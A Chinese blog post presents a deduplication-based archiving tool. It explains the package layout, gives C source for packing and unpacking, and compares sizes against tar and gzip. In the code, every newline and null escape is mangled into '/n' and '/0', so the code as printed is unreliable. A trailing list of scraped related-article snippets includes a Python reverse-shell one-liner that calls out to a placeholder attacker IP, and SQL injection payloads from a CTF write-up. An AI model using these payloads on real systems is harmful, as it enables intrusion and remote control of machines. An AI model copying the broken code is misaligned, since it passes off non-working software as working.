javasalatu

基于Dedup的数据打包技术

基于Dedup的数据打包技术

作者简介：刘爱贵，研究方向为网络存储、数据挖掘和分布式计算；毕业于中科院，目前从事存储软件研发工作。 Email: [email protected]
注：作者学识和经验水平有限，如有错误或不当之处，敬请批评指正。

0、引言
Tar, winrar, winzip是最为常见的数据打包工具软件，它们把文件集体封装成一个单独的数据包，从而方便数据的分布、传输、归档以及持久保存等目的。这类工具通常都支持数据压缩技术，从而有效减少数据的存储空间，常用压缩算法有Huffman编码、Z77/z78、LZW等。压缩算法的原理是通过对数据的重新编码，高频率数据片段采用较短的编码，低频率数据片段采用较长的编码，从而获得全局的上数据量较小的文件表示。

1、Dedup原理
Deduplication，即重复数据删除，它是一种非常新的且流行度很高的存储技术，可以大大减少数据的数量。重复数据删除技术，通过数据集中重复的数据，从而消除冗余数据。借助dedup技术，可以提高存储系统的效率，有效节约成本、减少传输过程中的网络带宽。同时它也是一种绿色存储技术，能有效降低能耗(存储空间小了，所需要存储系统磁盘也就少了，自然所需要电能就减少了)。
dedup按照消重的粒度可以分为文件级和数据块级。文件级的dedup技术也称为单一实例存储(SIS, Single Instance Store)，数据块级的重复数据删除，其消重粒度更小，可以达到4-24KB之间。显然，数据块级的可以提供更高的数据消重率，因此目前主流的dedup产品都是数据块级的。重复数据删除原理如下图所示。将文件都分割成数据块(可以是定长或变长的数据块)，采用MD5或SHA1等Hash算法(可以同时使用两种或以上hash算法，或CRC校验等，以获得非常小概率的数据碰撞发生)为数据块计算FingerPrint。具有相同FP指纹的数据块即可认为是相同的数据块，存储系统中仅需要保留一份。这样，一个物理文件在存储系统中就对应一个逻辑表示，由一组FP组成的元数据。当进行读取文件时，先读取逻辑文件，然后根据FP序列，从存储系统中取出相应数据块，还原物理文件副本。
重复数据删除目前主要应用于数据备份，因此对数据进行多次备份后，存在大量重复数据，非常适合dedup技术。事实上，dedup技术可以用于很多场合，包括在线数据、近线数据、离线数据存储系统，甚至可以在文件系统、卷管理器、NAS、SAN中实施。还可以用于网络数据传输，当然也可以应用于数据打包技术。dedup技术可以帮助众多应用降低数据存储量，节省网络带宽，提高存储效率、减小备份窗口，绿色节能。这里，基于dedup实现一种数据打包技术。

2、基于Dedup的数据打包模型

数据包文件的数据布局：

Header

Unique block data

File metadata

数据包由三部分组成：文件头(header)、唯一数据块集(unique block data)和逻辑文件元数据(file metadata)。其中，header为一个结构体，定义了数据块大小、唯一数据块数量、数据块ID大小、包中文件数量、元数据在包中的位置等元信息。文件头后紧接就存储着所有唯一的数据块，大小和数量由文件头中元信息指示。在数据块之后，就是数据包中文件的逻辑表示元数据，由多个实体组成，结构如下所示，一个实体表示一个文件。解包时根据文件的元数据，逐一提取数据块，还原出当初的物理文件。

逻辑文件的元数据表示：

Entry header

pathname

Entry data

Last block data

逻辑文件的实体头中记录着文件名长度、数据块数量、数据块ID大小和最后一个数据块大小等信息。紧接着是文件名数据，长度在实体头中定义。文件名数据之后，存储着一组唯一数据块的编号，编号与唯一数据块集中的数据块一一对应。最后存储着文件最后一个数据块，由于这个数据块大小通常比正常数据块小，重复概率非常小，因此单独保存。

3、原型实现
基于上面的数据布局，就可以实现支持重复数据删除的数据打包方法。本人在Linux系统上实现了一个原型，实现中使用了hashtable来记录和查询唯一数据块信息，使用MD5算法计算数据块指纹，并使用zlib中的z77压缩算法对删除了重复数据后的数据包进行压缩。hashtable, MD5, z77算法和实现，这里不作介绍，有兴趣的读者可以参考相关资源。下面给出dedup.h, dedup.c undedup.c源码文件。目前实现的原型还相对比较粗糙。

/* dedup.h */

#ifndef _DEDUP_H #define _DEDUP_H #include "md5.h" #include "hash.h" #include "hashtable.h" #include "libz.h" #ifdef __cplusplus extern "C" { #endif /* * deduplication file data layout * -------------------------------------------------- * | header | unique block data | file metadata | * -------------------------------------------------- * * file metedata entry layout * ----------------------------------------------------------------- * | entry header | pathname | entry data | last block data | * ----------------------------------------------------------------- */ typedef unsigned int block_id_t; #define BLOCK_SIZE 4096 /* 4K Bytes */ #define BACKET_SIZE 10240 #define MAX_PATH_LEN 255 #define BLOCK_ID_SIZE (sizeof(block_id_t)) /* deduplication package header */ #define DEDUP_MAGIC_NUM 0x1329149 typedef struct _dedup_package_header { unsigned int block_size; unsigned int block_num; unsigned int blockid_size; unsigned int magic_num; unsigned int file_num; unsigned long long metadata_offset; } dedup_package_header; #define DEDUP_PKGHDR_SIZE (sizeof(dedup_package_header)) /* deduplication metadata entry header */ typedef struct _dedup_entry_header { unsigned int path_len; unsigned int block_num; unsigned int entry_size; unsigned int last_block_size; int mode; } dedup_entry_header; #define DEDUP_ENTRYHDR_SIZE (sizeof(dedup_entry_header)) #ifdef __cplusplus } #endif #endif
/* dedup.c */

#include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <sys/stat.h> #include <dirent.h> #include <unistd.h> #include <getopt.h> #include <fcntl.h> #include <dirent.h> #include <errno.h> #include "dedup.h" /* unique block number in package */ static unsigned int g_unique_block_nr = 0; /* regular file number in package */ static unsigned int g_regular_file_nr = 0; /* block length */ static unsigned int g_block_size = BLOCK_SIZE; /* hashtable backet number */ static unsigned int g_htab_backet_nr = BACKET_SIZE; void show_md5(unsigned char md5_checksum[16]) { int i; for (i = 0; i < 16; i++) { printf("%02x", md5_checksum[i]); } } void show_pkg_header(dedup_package_header dedup_pkg_hdr) { printf("block_size = %d/n", dedup_pkg_hdr.block_size); printf("block_num = %d/n", dedup_pkg_hdr.block_num); printf("blockid_size = %d/n", dedup_pkg_hdr.blockid_size); printf("magic_num = 0x%x/n", dedup_pkg_hdr.magic_num); printf("file_num = %d/n", dedup_pkg_hdr.file_num); printf("metadata_offset = %lld/n", dedup_pkg_hdr.metadata_offset); } int dedup_regfile(char *fullpath, int prepos, int fd_bdata, int fd_mdata, hashtable *htable, int debug) { int fd; char *buf = NULL; unsigned int rwsize, pos; unsigned char md5_checksum[16 + 1] = {0}; unsigned int *metadata = NULL; unsigned int block_num = 0; struct stat statbuf; dedup_entry_header dedup_entry_hdr; if (-1 == (fd = open(fullpath, O_RDONLY))) { perror("open regulae file"); return errno; } if (-1 == fstat(fd, &statbuf)) { perror("fstat regular file"); goto _DEDUP_REGFILE_EXIT; } block_num = statbuf.st_size / g_block_size; metadata = (unsigned int *)malloc(BLOCK_ID_SIZE * block_num); if (metadata == NULL) { perror("malloc metadata for regfile"); goto _DEDUP_REGFILE_EXIT; } buf = (char *)malloc(g_block_size); if (buf == NULL) { perror("malloc buf for regfile"); goto _DEDUP_REGFILE_EXIT; } pos = 0; while (rwsize = read(fd, buf, g_block_size)) { /* if the last block */ if (rwsize != g_block_size) break; /* calculate md5 */ md5(buf, rwsize, md5_checksum); /* check hashtable with hashkey */ unsigned int *bindex = (block_id_t *)hash_value((void *)md5_checksum, htable); if (bindex == NULL) { bindex = (unsigned int *)malloc(BLOCK_ID_SIZE); if (NULL == bindex) { perror("malloc in dedup_regfile"); break; } /* insert hash entry and write unique block into bdata*/ *bindex = g_unique_block_nr; hash_insert((void *)strdup(md5_checksum), (void *)bindex, htable); write(fd_bdata, buf, rwsize); g_unique_block_nr++; } metadata[pos] = *bindex; memset(buf, 0, g_block_size); memset(md5_checksum, 0, 16 + 1); pos++; } /* write metadata into mdata */ dedup_entry_hdr.path_len = strlen(fullpath) - prepos; dedup_entry_hdr.block_num = block_num; dedup_entry_hdr.entry_size = BLOCK_ID_SIZE; dedup_entry_hdr.last_block_size = rwsize; dedup_entry_hdr.mode = statbuf.st_mode; write(fd_mdata, &dedup_entry_hdr, sizeof(dedup_entry_header)); write(fd_mdata, fullpath + prepos, dedup_entry_hdr.path_len); write(fd_mdata, metadata, BLOCK_ID_SIZE * block_num); write(fd_mdata, buf, rwsize); g_regular_file_nr++; _DEDUP_REGFILE_EXIT: close(fd); if (metadata) free(metadata); if (buf) free(buf); return 0; } int dedup_dir(char *fullpath, int prepos, int fd_bdata, int fd_mdata, hashtable *htable, int debug) { DIR *dp; struct dirent *dirp; struct stat statbuf; char subpath[MAX_PATH_LEN] = {0}; if (NULL == (dp = opendir(fullpath))) { return errno; } while ((dirp = readdir(dp)) != NULL) { if (strcmp(dirp->d_name, ".") == 0 || strcmp(dirp->d_name, "..") == 0) continue; sprintf(subpath, "%s/%s", fullpath, dirp->d_name); if (0 == lstat(subpath, &statbuf)) { if (debug) printf("%s/n", subpath); if (S_ISREG(statbuf.st_mode)) dedup_regfile(subpath, prepos, fd_bdata, fd_mdata, htable,debug); else if (S_ISDIR(statbuf.st_mode)) dedup_dir(subpath, prepos, fd_bdata, fd_mdata, htable, debug); } } closedir(dp); return 0; } int dedup_package(int path_nr, char **src_paths, char *dest_file, int debug) { int fd, fd_bdata, fd_mdata, ret = 0; struct stat statbuf; hashtable *htable = NULL; dedup_package_header dedup_pkg_hdr; char **paths = src_paths; int i, rwsize, prepos; char buf[1024 * 1024] = {0}; if (-1 == (fd = open(dest_file, O_WRONLY | O_CREAT, 0755))) { perror("open dest file"); ret = errno; goto _DEDUP_PKG_EXIT; } htable = create_hashtable(g_htab_backet_nr); if (NULL == htable) { perror("create_hashtable"); ret = errno; goto _DEDUP_PKG_EXIT; } fd_bdata = open("./.bdata", O_RDWR | O_CREAT, 0777); fd_mdata = open("./.mdata", O_RDWR | O_CREAT, 0777); if (-1 == fd_bdata || -1 == fd_mdata) { perror("open bdata or mdata"); ret = errno; goto _DEDUP_PKG_EXIT; } g_unique_block_nr = 0; g_regular_file_nr = 0; for (i = 0; i < path_nr; i++) { if (lstat(paths[i], &statbuf) < 0) { perror("lstat source path"); ret = errno; goto _DEDUP_PKG_EXIT; } if (S_ISREG(statbuf.st_mode) || S_ISDIR(statbuf.st_mode)) { if (debug) printf("%s/n", paths[i]); /* get filename position in pathname */ prepos = strlen(paths[i]) - 1; if (strcmp(paths[i], "/") != 0 && *(paths[i] + prepos) == '/') { *(paths[i] + prepos--) = '/0'; } while(*(paths[i] + prepos) != '/' && prepos >= 0) prepos--; prepos++; if (S_ISREG(statbuf.st_mode)) dedup_regfile(paths[i], prepos, fd_bdata, fd_mdata, htable, debug); else dedup_dir(paths[i], prepos, fd_bdata, fd_mdata, htable, debug); } else { if (debug) printf("%s is not regular file or directory./n", paths[i]); } } /* fill up dedup package header */ dedup_pkg_hdr.block_size = g_block_size; dedup_pkg_hdr.block_num = g_unique_block_nr; dedup_pkg_hdr.blockid_size = BLOCK_ID_SIZE; dedup_pkg_hdr.magic_num = DEDUP_MAGIC_NUM; dedup_pkg_hdr.file_num = g_regular_file_nr; dedup_pkg_hdr.metadata_offset = DEDUP_PKGHDR_SIZE + g_block_size * g_unique_block_nr; write(fd, &dedup_pkg_hdr, DEDUP_PKGHDR_SIZE); /* fill up dedup package unique blocks*/ lseek(fd_bdata, 0, SEEK_SET); while(rwsize = read(fd_bdata, buf, 1024 * 1024)) { write(fd, buf, rwsize); memset(buf, 0, 1024 * 1024); } /* fill up dedup package metadata */ lseek(fd_mdata, 0, SEEK_SET); while(rwsize = read(fd_mdata, buf, 1024 * 1024)) { write(fd, buf, rwsize); memset(buf, 0, 1024 * 1024); } if (debug) show_pkg_header(dedup_pkg_hdr); _DEDUP_PKG_EXIT: close(fd); close(fd_bdata); close(fd_mdata); unlink("./.bdata"); unlink("./.mdata"); hash_free(htable); return ret; } void usage() { printf("Usage: dedup [OPTION...] <target file> <source files ...>/n"); printf("/nPackage files with deduplicaton technique./n"); printf("Mandatory arguments to long options are mandatory for short options too./n"); printf(" -z, --compress filter the archive through compress/n"); printf(" -b, --block block size for deduplication, default is 4096/n"); printf(" -t, --hashtable hashtable backet number, default is 10240/n"); printf(" -d, --debug print debug messages/n"); printf(" -h, --help give this help list/n"); printf("/nReport bugs to <Aigui.Liu@gmail.com>./n"); } int main(int argc, char *argv[]) { char tmp_file[] = "./.dedup/0"; int bz = 0, bhelp = 0, bdebug = 0; int ret = -1, c; struct option longopts[] = { {"compress", 0, &bz, 'z'}, {"block", 1, 0, 'b'}, {"hashtable", 1, 0, 't'}, {"debug", 0, &bdebug, 'd'}, {"help", 0, &bhelp, 'h'}, {0, 0, 0, 0} }; /* parse options */ while ((c = getopt_long (argc, argv, "zb:t:dh", longopts, NULL)) != EOF) { switch(c) { case 'z': bz = 1; break; case 'b': g_block_size = atoi(optarg); break; case 't': g_htab_backet_nr = atoi(optarg); break; case 'd': bdebug = 1; break; case 'h': case '?': default: bhelp = 1; break; } } if (bhelp == 1 || (argc - optind) < 2) { usage(); return 0; } if (bz) { /* dedup and compress */ ret = dedup_package(argc - optind -1 , argv + optind + 1, tmp_file, bdebug); if (ret == 0) { ret = zlib_compress_file(tmp_file, argv[optind]); unlink(tmp_file); } } else { /* dedup only */ ret = dedup_package(argc - optind - 1, argv + optind + 1, argv[optind], bdebug); } return ret; }

/* undedup.c */

#include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <sys/stat.h> #include <unistd.h> #include <getopt.h> #include <fcntl.h> #include <errno.h> #include "dedup.h" /* block length */ static unsigned int g_block_size = BLOCK_SIZE; void show_pkg_header(dedup_package_header dedup_pkg_hdr) { printf("block_size = %d/n", dedup_pkg_hdr.block_size); printf("block_num = %d/n", dedup_pkg_hdr.block_num); printf("blockid_size = %d/n", dedup_pkg_hdr.blockid_size); printf("magic_num = 0x%x/n", dedup_pkg_hdr.magic_num); printf("file_num = %d/n", dedup_pkg_hdr.file_num); printf("metadata_offset = %lld/n", dedup_pkg_hdr.metadata_offset); } int prepare_target_file(char *pathname, char *basepath, int mode) { char fullpath[MAX_PATH_LEN] = {0}; char path[MAX_PATH_LEN] = {0}; char *p = NULL; int pos = 0, fd; sprintf(fullpath, "%s/%s", basepath, pathname); p = fullpath; while (*p != '/0') { path[pos++] = *p; if (*p == '/') mkdir(path, 0755); p++; } fd = open(fullpath, O_WRONLY | O_CREAT, mode); return fd; } int undedup_regfile(int fd, dedup_entry_header dedup_entry_hdr, char *dest_dir, int debug) { char pathname[MAX_PATH_LEN] = {0}; block_id_t *metadata = NULL; unsigned int block_num = 0; char *buf = NULL; char *last_block_buf = NULL; long long offset, i; int fd_dest, ret = 0; metadata = (block_id_t *) malloc(BLOCK_ID_SIZE * dedup_entry_hdr.block_num); if (NULL == metadata) return errno; buf = (char *)malloc(g_block_size); last_block_buf = (char *)malloc(g_block_size); if (NULL == buf || NULL == last_block_buf) { ret = errno; goto _UNDEDUP_REGFILE_EXIT; } read(fd, pathname, dedup_entry_hdr.path_len); read(fd, metadata, BLOCK_ID_SIZE * dedup_entry_hdr.block_num); read(fd, last_block_buf, dedup_entry_hdr.last_block_size); fd_dest = prepare_target_file(pathname, dest_dir, dedup_entry_hdr.mode); if (fd_dest == -1) { ret = errno; goto _UNDEDUP_REGFILE_EXIT; } if (debug) printf("%s/%s/n", dest_dir, pathname); /* write regular block */ block_num = dedup_entry_hdr.block_num; for(i = 0; i < block_num; ++i) { offset = DEDUP_PKGHDR_SIZE + metadata[i] * g_block_size; lseek(fd, offset, SEEK_SET); read(fd, buf, g_block_size); write(fd_dest, buf, g_block_size); } /* write last block */ write(fd_dest, last_block_buf, dedup_entry_hdr.last_block_size); close(fd_dest); _UNDEDUP_REGFILE_EXIT: if (metadata) free(metadata); if (buf) free(buf); if (last_block_buf) free(last_block_buf); return ret; } int undedup_package(char *src_file, char *dest_dir, int debug) { int fd, i, ret = 0; dedup_package_header dedup_pkg_hdr; dedup_entry_header dedup_entry_hdr; unsigned long long offset; if (-1 == (fd = open(src_file, O_RDONLY))) { perror("open source file"); return errno; } if (read(fd, &dedup_pkg_hdr, DEDUP_PKGHDR_SIZE) != DEDUP_PKGHDR_SIZE) { perror("read dedup_package_header"); ret = errno; goto _UNDEDUP_PKG_EXIT; } if (debug) show_pkg_header(dedup_pkg_hdr); offset = dedup_pkg_hdr.metadata_offset; for (i = 0; i < dedup_pkg_hdr.file_num; ++i) { if (lseek(fd, offset, SEEK_SET) == -1) { ret = errno; break; } if (read(fd, &dedup_entry_hdr, DEDUP_ENTRYHDR_SIZE) != DEDUP_ENTRYHDR_SIZE) { ret = errno; break; } ret = undedup_regfile(fd, dedup_entry_hdr, dest_dir, debug); if (ret != 0) break; offset += DEDUP_ENTRYHDR_SIZE; offset += dedup_entry_hdr.path_len; offset += dedup_entry_hdr.block_num * dedup_entry_hdr.entry_size; offset += dedup_entry_hdr.last_block_size; } _UNDEDUP_PKG_EXIT: close(fd); return ret; } void usage() { printf("Usage: undedup [OPTION...] <source file>/n"); printf("/nUnpackage files with deduplicaton technique./n"); printf("Mandatory arguments to long options are mandatory for short options too./n"); printf(" -z, --uncompress filter the archive through uncompress/n"); printf(" -c, --directory change to directory, default is PWD/n"); printf(" -d, --debug print debug messages/n"); printf(" -h, --help give this help list/n"); printf("/nReport bugs to <Aigui.Liu@gmail.com>./n"); } int main(int argc, char *argv[]) { char tmp_file[] = "./.dedup/0"; char path[MAX_PATH_LEN] = "./0"; int bz = 0, bhelp = 0, bdebug = 0; int ret = -1, c; struct option longopts[] = { {"compress", 0, &bz, 'z'}, {"directory", 1, 0, 'c'}, {"debug", 0, &bdebug, 'd'}, {"help", 0, &bhelp, 'h'}, {0, 0, 0, 0} }; while ((c = getopt_long (argc, argv, "zc:dh", longopts, NULL)) != EOF) { switch(c) { case 'z': bz = 1; break; case 'c': sprintf(path, "%s", optarg); break; case 'd': bdebug = 1; break; case 'h': case '?': default: bhelp = 1; break; } } if (bhelp == 1 || (argc - optind) < 1) { usage(); return 0; } if (bz) { /* uncompress and undedup */ ret = zlib_decompress_file(argv[optind], tmp_file); if (ret == 0) { ret = undedup_package(tmp_file, path, bdebug); unlink(tmp_file); } } else { /* only undedup */ ret = undedup_package(argv[optind], path, bdebug); } return ret; }
/* dedup usage */
Usage: dedup [OPTION...] <target file> <source files ...>

Package files with deduplicaton technique.

-z, --compress filter the archive through compress
-b, --block block size for deduplication, default is 4096
-t, --hashtable hashtable backet number, default is 10240
-d, --debug print debug messages
-h, --help give this help list

/* undedup usage */
Usage: undedup [OPTION...] <source file>

Unpackage files with deduplicaton technique.

-z, --uncompress filter the archive through uncompress
-c, --directory change to directory, default is PWD
-d, --debug print debug messages
-h, --help give this help list

4、初步测试
这里使用linux最新的kernel源码进行测试，并与tar工具进行比较。从www.kernel.org 下载linux-2.6.32.tar.gz文件，并解压出源文件，然后分别使用tar和dedup工具进行打包，分别得到以下几个文件。

Filename	File size	commands
linux-2.6.32.tar	382392320 (365MB)	tar cvf linux-2.6.32.tar linux-2.6.32/
linux-2.6.32.tar.dd	380381944 (363M)	dedup linux-2.6.32.tar.dd linux-2.6.32.tar
linux-2.6.32.dd	357325910 (341MB)	dedup linux-2.6.32.dd linux-2.6.32/
linux-2.6.32.tar.gz	84322110 (81MB)	gzip -c linux-2.6.32.tar > linux-2.6.32.tar.gz
linux-2.6.32.tar.dd.gz	83978234 (81MB)	gzip -c linux-2.6.32.tar.dd > linux-2.6.32.tar.dd.gz
linux-2.6.32.dd.gz	83674306 (80MB)	gzip -c linux-2.6.32.dd > linux-2.6.32.dd.gz

linux-2.6.32.tar.gz解压出来的kernel源码文件数据很多，使用这个文件来测试应该具有普遍的意义。通过初步的测试结果，我们可以看出，即使在这样不明确数据是否具备较高重复率的情况下，dedup技术也能较明显地减少数据包的数据量。在数据重复率很高的测试用例下，比如全0或全1的大文件，dedup要远远优于tar。比如，全0的64MB文件，tar+gzip的结果为65KB，而dedup的结果才有286字节。

5、TODO
1、变长数据块。目前是定长数据块的实现，技术上较为简单，变长数据块可能会获得更高的数据压缩率。
2、相似文件识别。如果两个文件只有很小的差别，比如在某处插入了若干字节，找出这些数据块并单独处理，可能会提高数据压缩率。

Spark 4.0的VariantType 类型以及内部存储鸿乃江边鸟大数据 SQL spark spark sql 大数据
背景本文基于Spark4.0总结Spark中的VariantType类型，用尽量少的字节来存储Json的格式化数据分析这里主要介绍Variant的存储，我们从VariantBuilder.buildJson方法(把对应的json数据存储为VariantType类型)开始：publicstaticVariantparseJson(JsonParserparser,booleanallowDuplic
flutter ios打包_Flutter iOS 打包等采坑ing... WIDGAF flutter ios打包
flutter打包报错记录：Unexpectedduplicatetasks处理方法：修改项目编译，不使用NewBuildSystem，在File>Project/WorkspaceSettings中的ShareProject/WorkspaceSettings里buildsystem将NewBuildSystem(Default)切换成Legacybuildsystem。ERROR:Flutte
ArduPilot + Gazebo + Mavros + QGC+遥控器控制实践我叫蜈蚣你记住无人机机器人
本文记录了ArduPilot+Gazebo+Mavros+QGC+遥控器的仿真环境配置过程，通过Guided模式控制四旋翼无人机以当前位置为圆心画圆。目录1ArduPilotSITL(SoftwareInTheLoop)环境搭建1.1ArduPilot编译环境安装1.2ROS一键安装1.3Gazebo安装1.4Mavros安装及配置1.5接入遥控器1.6实例：画圆2实机测试环境：Ubuntu20.
[第一章 web入门]SQL注入-2 weixin_40546436 渗透测试
1通过updatexml取数据从页面发现有一个提示如果加上?tips=1的话，通过burpsuite发包可以通过updatexml来查看回显，可以通过这个取到数据下面是通过updatexml来注入，这时4步中用到语句name=admin’andupdatexml(1,concat(0x7e,(select(database())),0x7e),1)#&pass=bbname=admin’andup
《UNIX环境高级编程》笔记第三章——文件IO（2) day_day_hard_up Linux系统编程笔记 linux c语言 unix
1.简介本文是上一篇笔记文件IO（1）的续写，接下来继续补充一些文件IO特性以及介绍剩下的一些函数。文件IO的读写效率与调用时传入的buf大小有关，也与打开的文件描述标志有关（O_SYNC和O_DSYNC），影响效率IO效率的相关函数有sync、fsync和fdatasync。理解dup、dup2和fcntl函数的预前知识:（1）每个进在进程表中都有一个记录项，记录项包含一张打开的文件描述符表，每
字符串篇(python)—如何统计字符串中连续的重复字符个数_python随机给出字符串,统计连续且相同个数 2401_84141337 程序员 python 开发语言
"""递归实现一个求字符串中连续出现相同字符的最大值例如字符串"aaabbcc"最大值为a3解题思路遍历字符串的时候定义两个变量curMaxLen记录当前遍历字符重复的连续字符个数maxLen遍历到目前为止找到最长的连续重复字符的个数"""defgetMaxDupChar(s,startIndex,curMaxLen,maxLen):ifstartIndex==len(s)-1:returnmax
算法学习day6----双指针-最长不重复子序列阴暗老鼠人学习
Givenanintegersequenceoflengthn,pleasefindthelongestcontinuousintervalwithoutduplicatenumbersandoutputitslength.Thefirstlinecontainsanintegern.Thesecondlinecontainsnintegers(allwithintherangeof0to105)
大事件项目记录6-用户接口开发-更新用户密码 a_Dragon1 Spring Boot学习记录数据库 spring boot java intellij-idea
(6）更新用户密码。UserController.java：UserService.java：UserServiceInterface.java：@OverridepublicvoidupdatePwd(StringnewPwd){Mapmap=ThreadLocalUtil.get();Integerid=(Integer)map.get("id");userMapper.updatePwd(M
jupyter notebook Kernel Restarting内核崩溃的解决百万年薪天才少女 jupyter linux ide
一直报错KernelRestartingThekernelforgrokking/attentionmatricx.ipynbappearstohavedied.Itwillrestartautomatically.通过以下方法得到了快速解决：设置环境变量虽然这只是一个临时的解决方案，你可以尝试设置环境变量KMP_DUPLICATE_LIB_OK=TRUE。通过这个设置，程序将继续执行，但可能会导
基于C#的OPCServer应用开发，引用WtOPCSvr.dll
操作流程：1.引入WtOPCSvr.dll文件2.注册服务：使用UpdateRegistry方法注册，注意关闭应用时使用UnregisterServer取消注册。3.初始化服务：使用InitWTOPCsvr初始化4.使用CreateTag方法，创建标签5.读写参数使用下面三个方法：StartUpdateTagsUpdateTagEndUpdateTags6.当发生客户端写操作的时候，服务器执行下面
使用 Python 实现反弹 shell suanfa_student python chrome 开发语言
使用Python实现反弹shell如果目标系统有Python环境，可以使用以下Python命令反弹shell：python-c'importsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("你的IP地址",端口号));os.dup2(s.fileno(),0);os.dup2(s.
websocket多客户端接收消息_WebSocket之消息接收发送 weixin_39940344
WebSocket协议是基于TCP的一种新的网络协议。它实现了浏览器与服务器全双工(full-duplex)通信——允许服务器主动发送信息给客户端。在WebSocketAPI中，浏览器和服务器只需要完成一次握手，两者之间就直接可以创建持久性的连接，并进行双向数据传输。http协议是单向通信，一般由客户端发起请求，然后接收服务端响应。如果要实现客户端实时消息跟新功能如：更新聊天消息，更新邮件信息，更
[学习] PID算法原理与实践（代码示例）极客不孤独学习算法 c语言
PID算法原理与实践文章目录PID算法原理与实践一、PID算法原理1.1PID算法概述1.定义2.应用领域3.核心目标1.2基本原理1.3数学表达离散化实现（适用于数字控制）二、实践案例（C语言）1.电机转速控制2.温度控制系统3.时钟驯服系统三、常见问题与优化1.积分饱和（Windup）问题2.噪声干扰问题3.非线性系统适配问题四、扩展方向1.数字PID与模拟PID的差异2.变参数PID（如增益
Go实现寻找重复数 Sky、、 golang 算法开发语言
packagemainimport"fmt"funcmain(){intarr:=[]int{1,3,4,2,2}duplicate:=findDuplicate(intarr)fmt.Println(duplicate)}funcfindDuplicate(nums[]int)int{numse:=make(map[int]int)fori:=rangenums{if_,ok:=numse[nu
【Unity】常见对象旋转方法 EucliwoodXT Unity unity 游戏引擎
1前言记录下常见的游戏对象旋转API。2旋转API2.1Transform.Rotate自身旋转。publicvoidRotate(Vector3eulers,SpacerelativeTo=Space.Self);eulers：旋转角度。relativeTo：坐标轴。代码：usingUnityEngine;publicclass_Rotation:MonoBehaviour{voidUpdate
React中的useEffect详解前端页面仔 react.js javascript 前端
React中的useEffect详解什么是useEffect？useEffect是ReactHooks中最重要的一个Hook，它允许你在函数组件中执行副作用操作。简单来说，它相当于类组件中的componentDidMount、componentDidUpdate和componentWillUnmount这三个生命周期方法的组合。基本语法import{useEffect}from'react';fu
linux进程间通信(IPC) ---- 文件描述符 dup dup2 流光一逝&& linux千峰 linux
文件描述符概述文件描述符是非负整数，是文件的标识用户使用文件描述符(filedescriptor)来访问文件利用open打开一个文件时，内核会返回一个文件描述符每个进程都有一张文件描述符的表，进程刚被创建时，标准输入，标准输出，标准错误输出设备文件被打开，对应的文件描述符0，1，2记录在表中在进程中打开其他文件时，系统会返回文件描述符表中最小可用的文件描述符，并将此文件描述符记录在表中注意：lin
【Linux】文件描述符和重定向好像有点东西 Linux linux
目录一、回顾C文件二、系统文件I/O2.1系统调用open2.2标志位传参2.3系统调用write2.4文件描述符fd2.5structfile2.6fd的分配规则2.7重定向2.7.1基本原理：2.7.2系统调用dup22.8标准错误一、回顾C文件文件=内容+属性对文件的操作：a.对内容操作b.对属性操作内容是数据，属性其实也是数据——存储文件，必须既存储内容，又存储属性数据——默认文件是在磁盘
【StarRocks系列】建表优化漫步者TZ StarRocks StarRocks 分布式数据库
目录一、数据模型选择(核心优化)二、分区与分桶策略(数据分布优化)三、字段类型与压缩四、索引策略五、高级特性应用六、建表示例（关键优化整合）参考官网优化性能|StarRocks在StarRocks中创建表时，合理的表设计是性能优化的基石。以下是从多个关键方向考虑的优化要点：一、数据模型选择(核心优化)明细模型(DuplicateKey)适用场景：需要保留原始明细数据（如日志、交易流水）、任意维度组
前端大文件分片上传与断点续传方案 weixin_47233946 编程前端
##一、背景与需求在处理大文件上传时（如视频、设计稿等），传统单次上传方式存在以下问题：-网络波动导致上传失败需重新上传-服务器限制单次请求大小-无法暂停/恢复上传-上传进度难以跟踪分片上传与断点续传方案能有效解决这些问题，提升用户体验和上传可靠性。---##二、核心概念###1.分片上传（ChunkedUpload）将大文件切割为多个小分片（如2MB/片），逐个上传分片，最后在服务端合并。###
MySQL-DML语句深度解析与实战指南
MySQL-DML语句深度解析与实战指南一、DML语句概述1.1什么是DML1.2主要DML语句二、INSERT语句详解2.1基本INSERT语法2.2插入多行数据2.3从其他表插入数据2.4INSERT...ONDUPLICATEKEYUPDATE三、SELECT语句详解3.1基本SELECT语法3.2高级查询技巧3.2.1多表连接查询3.2.2子查询3.2.3聚合函数3.2.4分组查询四、UP
数据结构--单向链表 k * 数据结构链表
1．按位置查找返回元素的值//按位置查找元素intquery_num(node_pP,intpos){if(P==NULL){return0;}if(posP->len){printf("所选插入位置不准确\n");return0;}inti;node_pH=P;for(i=0;inext);returnH->data;}2.按值修改(多个一样的值改第一个)//按值修改voidupdate_val
python-pandas库 yogima python python pandas
文章目录一、什么是pandas库？二、文件的读取和写入三、DataFrame1、DataFrame的构造2、DataFrame的方法3、数据合并mergeconcat4、数据清洗dropnafillnadrop_duplicates删去数据错误的行5、排序与聚合排序分组和聚合一、什么是pandas库？pandas是python的三方库，常用于对数据清洗、转换和分析。有两种重要的数据结构:Serie
Python中Pandas常用函数及案例详解 2401_84009215 程序员 pandas python 开发语言
7.使用value\_counts()查看值的分布查看某一列中不同值的计数print(df[‘A’].value_counts())8.使用unique()查看唯一值查看某一列中唯一的出现的值print(df[‘A’].unique())9.使用duplicated()检查重复值检查DataFrame中的重复行print(df.duplicated())检查DataFrame中没有重复行print
My Experience with Hyperlane A Rust Newbie’s Journey in Developing a Campus API WA-自动机 rust 前端开发语言编程后端 java spring boot
Asajuniorcomputersciencestudent,Iwasworkingonacampussecond-handtradingplatformprojectlastsemesterwhenIstumbledupontheHyperlaneRustHTTPframework.Iwasinadilemmaaboutchoosingaframework—itneededtobepowerf
My Experience with Hyperlane A Rust Newbie’s Journey in Developing a Campus API WA-自动机 rust 前端开发语言编程后端 java spring boot
Asajuniorcomputersciencestudent,Iwasworkingonacampussecond-handtradingplatformprojectlastsemesterwhenIstumbledupontheHyperlaneRustHTTPframework.Iwasinadilemmaaboutchoosingaframework—itneededtobepowerf
OpenCV CUDA模块图像变形------对图像进行上采样操作函数pyrUp() 村北头的码农 OpenCV opencv 人工智能计算机视觉
